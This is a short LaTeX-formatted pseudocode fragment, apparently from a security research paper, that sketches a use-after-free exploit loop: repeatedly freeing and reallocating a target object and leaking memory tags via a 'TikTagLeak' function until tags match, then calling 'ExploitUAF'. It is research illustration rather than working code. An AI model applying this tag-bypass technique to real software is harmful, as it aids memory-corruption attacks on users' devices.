\PY{k}{while}\PY{+w}{ }\PY{p}{(}\PY{n+nx}{tagA}\PY{+w}{ }\PY{o}{!=}\PY{+w}{ }\PY{n+nx}{tagB}\PY{p}{)}\PY{+w}{ }\PY{p}{\PYZob{}}
\PY{+w}{    }\PY{n+nx}{Free}\PY{p}{(}\PY{n+nx}{obj\PYZus{}target}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{n+nx}{obj\PYZus{}target}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{AllocTarget}\PY{p}{(}\PY{p}{)}\PY{p}{;}
\PY{+w}{    }\PY{n+nx}{tagB}\PY{+w}{ }\PY{o}{=}\PY{+w}{ }\PY{n+nx}{TikTagLeak}\PY{p}{(}\PY{n+nx}{idx}\PY{p}{)}\PY{p}{;}
\PY{p}{\PYZcb{}}
\PY{c+c1}{// tagA == tagB}
\PY{c+c1}{// corrupt obj\PYZus{}target}
\PY{n+nx}{ExploitUAF}\PY{p}{(}\PY{n+nx}{obj\PYZus{}vuln}\PY{p}{)}\PY{p}{;}
\end{Verbatim}

